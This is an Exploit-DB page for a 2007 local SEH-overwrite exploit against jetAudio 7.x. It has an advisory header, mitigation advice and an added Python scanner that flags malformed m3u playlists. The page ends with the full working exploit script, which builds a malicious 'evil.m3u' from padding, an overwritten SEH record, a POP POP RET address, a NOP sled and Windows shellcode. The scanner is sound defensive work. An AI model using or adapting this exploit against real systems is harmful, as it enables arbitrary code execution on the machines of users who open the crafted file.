Vendor: jetAudio
By: Krystian Kloskowski (h07) <h07@interia.pl>
CVSS: 7.5 (HIGH)
CWE: SEH Overwrite Exploit
Product Name: jetAudio
Affected Version From: jetAudio 7.x
Affected Version To: jetAudio 7.x
Patch Exists: NO
Related CWE:
CPE: a:jetaudio:jetaudio:7.x
Metasploit:
Other Scripts:
Platforms Tested: Windows 2000 SP4 Polish
2007

jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit

This exploit takes advantage of an SEH (Structured Exception Handling) overwrite vulnerability in jetAudio 7.x. By supplying a specially crafted m3u file, an attacker can overwrite the SEH record and execute arbitrary code. The exploit has been tested on jetAudio 7.0.3 Basic on Windows 2000 SP4 Polish. The payload is a Windows Execute Command shellcode that launches the Calculator. This exploit is provided for educational purposes only.

Mitigation:

Apply the latest security patches provided by the vendor. Avoid opening or running suspicious m3u files from untrusted sources.
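
A defender-side check for the mitigation above, as an added example that is not part of the original advisory or exploit: it scans the raw bytes of a playlist for the traits this kind of file relies on (a line far longer than any real URL, long runs of one repeated byte, control bytes). The function name, the 512-byte limit and the sample playlists are assumptions, and the code is written for Python 3.

```python
import re

MAX_LINE_LEN = 512   # assumed threshold; tune it to the playlists you actually see
# 64 or more copies of the same byte in a row (padding or a NOP-style sled)
REPEAT_RUN = re.compile(rb"(.)\1{63,}", re.DOTALL)
# Control bytes that have no place in a text playlist (tab is allowed)
CONTROL = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def scan_m3u(data, max_len=MAX_LINE_LEN):
    """Return a list of (line_number, reason) findings for raw playlist bytes."""
    findings = []
    # bytes.splitlines() splits only on \n, \r and \r\n
    for lineno, line in enumerate(data.splitlines(), start=1):
        entry = line.strip()
        if not entry:
            continue
        if len(entry) > max_len:
            findings.append(
                (lineno, "entry is %d bytes, limit %d" % (len(entry), max_len)))
        if REPEAT_RUN.search(entry):
            findings.append((lineno, "run of 64+ identical bytes"))
        if CONTROL.search(entry):
            findings.append((lineno, "control bytes in entry"))
    return findings


# Constructed samples (not taken from the page): an ordinary playlist and
# one with an oversized, padded entry. Neither contains a payload.
CLEAN = (b"#EXTM3U\n"
         b"#EXTINF:215,Artist - Title\n"
         b"http://radio.example/stream.mp3\n")
SUSPECT = b"#EXTM3U\nhttp://" + b"A" * 1200 + b"\x90" * 128 + b"\x01\x02\n"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("suspect", SUSPECT)):
        hits = scan_m3u(blob)
        print(name, "OK" if not hits else hits)
```

Run it over files read in binary mode (`open(path, "rb").read()`) before they reach a media player; legitimate entries in a legacy code page pass, because only length, repetition and control bytes are checked.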
Source

Exploit-DB raw data:

#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun  ;) 
##

from struct import pack

m3u = ("#EXTM3U\nhttp://%s")

shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")

NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA61F7       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf = "CLICK ME"
buf += "\x20" * 1009
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "\x90" * 128
buf += shellcode

m3u %= buf

fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

print "DONE"

# EoF

# milw0rm.com [2007-10-14]